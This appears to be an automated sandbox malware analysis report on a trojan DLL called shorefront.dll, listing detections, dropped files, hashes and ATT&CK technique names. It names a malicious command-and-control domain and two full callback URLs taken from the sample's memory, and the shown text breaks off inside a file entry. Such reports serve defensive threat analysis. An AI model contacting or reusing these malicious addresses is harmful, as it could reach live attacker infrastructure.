Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
shorefront.dll	46%	Virustotal		Browse
shorefront.dll	54%	ReversingLabs	Win32.Trojan.Sdum
shorefront.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.4770000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.loaddll32.exe.500000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
6.2.rundll32.exe.3180000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Label	Link
app.buboleinov.com	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://app.buboleinov.com/7dGVcD7hOw3lYt5/1yqoO_2BT5cAFQCvp3/7fGu2bPOM/Y70HlHuovLn2gp_2B2GH/4_2FYxaP	0%	Avira URL Cloud	safe
http://app.buboleinov.com/BHxjQVeA3bCRL3A0U_2Bhx/6Mf2XW6xM9nlO/OBBDiHLG/gVHcEz5iH6i5Er6PkMAnMWX/IOi2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
app.buboleinov.com	unknown	unknown	true	7%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://app.buboleinov.com/7dGVcD7hOw3lYt5/1yqoO_2BT5cAFQCvp3/7fGu2bPOM/Y70HlHuovLn2gp_2B2GH/4_2FYxaP	~DF762A57E90D6A65CD.TMP.12.dr, {B147A470-C485-11EB-90EB-ECF4BBEA1588}.dat.12.dr	true	Avira URL Cloud: safe	unknown
http://app.buboleinov.com/BHxjQVeA3bCRL3A0U_2Bhx/6Mf2XW6xM9nlO/OBBDiHLG/gVHcEz5iH6i5Er6PkMAnMWX/IOi2	{B147A472-C485-11EB-90EB-ECF4BBEA1588}.dat.12.dr	true	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	429225
Start date:	03.06.2021
Start time:	18:04:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	shorefront.eps (renamed file extension from eps to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.winDLL@16/17@6/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.6% (good quality ratio 15.8%) Quality average: 79.5% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 80% Number of executed functions: 77 Number of non-executed functions: 120
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 13.107.5.88, 13.107.42.23, 168.61.161.212, 184.30.25.218, 92.122.145.220, 104.42.151.234, 2.20.142.210, 2.20.142.209, 40.126.31.139, 40.126.31.6, 40.126.31.141, 40.126.31.137, 20.190.159.138, 40.126.31.143, 40.126.31.1, 40.126.31.4, 20.82.209.183, 40.88.32.150, 104.43.193.48, 88.221.62.148, 92.122.213.247, 92.122.213.194 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, afdo-tas-offload.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, l-0014.l-msedge.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:06:28	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B147A46E-C485-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	50344
Entropy (8bit):	1.9993845315328929
Encrypted:	false
SSDEEP:	192:r7ZYZdg2QjW0StiifcBPzMgHB+HDMKzcIwpSuM62pSbKpif8qpitkwNkimRwxkES:rN4FdxL900tk+dY1
MD5:	7978357DDA034C05E56F55DA35366205
SHA1:	48E4CABD925132F6A720DBF850A937DFCCC69152
SHA-256:	6B8EEF1FA301C04940AA30E7958CFA1C07D64E11423141A358089F78E59A2F6A
SHA-512:	1EEDC44DAFC7B64B1D1A1F26CBC74940EE74451114AA089D2C2B5C6B130A3C52E86B6137B4723D74066F57A50A1F2714C28AC7FAFD6AFF32A4D1FCDE53C8AC41
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B147A470-C485-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27588
Entropy (8bit):	1.9124316644431674
Encrypted:	false
SSDEEP:	192:rIZvQf6hkOjt2lWeMGVwmJ06ibFVwmJ06ixmmA:rIoSSIk83qhIbhIwx
MD5:	2E09A548EF11126190EFD8E8398EFBB9
SHA1:	17B8746C47A049ACAA52C304C607FC7E2F192F2B
SHA-256:	80ABDEBCCF9BCFC80CAE6DB09CB39304A8338B6927C70E988258FCE27FB8D74D
SHA-512:	C827881750C667D70195CD98D9279DC92C4EDFEC76925A4CF12969F00DBA76B63B5B89BF6ECF88A2D803B3351C46ED78DE8BC2D1BE5E12CB8884376A63BDEE62
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B147A472-C485-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28156
Entropy (8bit):	1.922108016741325
Encrypted:	false
SSDEEP:	96:roZvQr69BS/jl2FW1MpdphCuQbKolpIK9hCuQeOA:roZvQr69k/jl2FW1Mpdpw9lpfwnA
MD5:	99B43810D1B0B8FB2D4795325EBFF699
SHA1:	2BEA2EB826754881F2135787DE63991849271614
SHA-256:	891910C972C0E0B618F60AE4B2ACDE679390016D197D089D3DAD579BBB31EB46
SHA-512:	B17DFCDE50DACF718C2CC975DE6F5725FD4E64ED73402D04512318F5F4D6EFA092E80E58ADEFC5BFA58695969AF98BB7A286E715F35BD5BD5C437FC6211AB7D2
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.457498499025032
Encrypted:	false
SSDEEP:	3:oVXUbVCE9Ts4T48JOGXnEbVCE9Ts4uk+n:o9Urn4qErq
MD5:	330A46A120DAA4AA27765FF48C17CFA2
SHA1:	D64846D9E5996A84A50FE3522DF95B8D995D187C
SHA-256:	4C01D98C1E31356C9F8DDB63A2320560DF77C8A37B6215E8C51E4440AFFECC12
SHA-512:	3DD1DED3DDE41C97ED2C1D32E9065F58D9FC8272D403D0BD7B2DFEEEE064A924AE80049DEF6917EFF2861F795F741AA7FCBE281E7D17EF49B0A26F0CD50C5245
Malicious:	false
Preview:	[2021/06/03 18:06:46.920] Latest deploy version: ..[2021/06/03 18:06:46.920] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF2325E3FA7AA39907.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40185
Entropy (8bit):	0.6775647831808976
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+EiIZCPphCuQbKephCuQbKZphCuQbK6:kBqoxKAuqR+EiIZCPpwVpwOpwT
MD5:	69940C57E758F61ED876E80B30613A47
SHA1:	643EE6264C9C8B4B54B84A83B7FCFF57B07F3B94
SHA-256:	85E2C83108205161715618459450AEA91475F42DE1B577CE9E2BA86B0FE1BB8F
SHA-512:	4353AFCF37B8DBD3E0B99D737F385125D3BF072A8ACB1FE27A57D08E239162AED77D2C6184297D553D61ACE72C2A1F1299E006BAAE9F65AC3E9FDC50808C2781
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF762A57E90D6A65CD.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40073
Entropy (8bit):	0.6558580738443309
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+tzxQTWwmJ06iRwmJ06iqwmJ06if:kBqoxKAuqR+tzxQTWhIRhIqhIf
MD5:	BED294CA39E721D92EE7C908AFAA80A9
SHA1:	E3B390F086560AF18F1C96F3633448B5B431C6D3
SHA-256:	52A5530CAFACE2F1C8A1D6D9B4E4B7A315236B316C6EF2C491278A9719F0B599
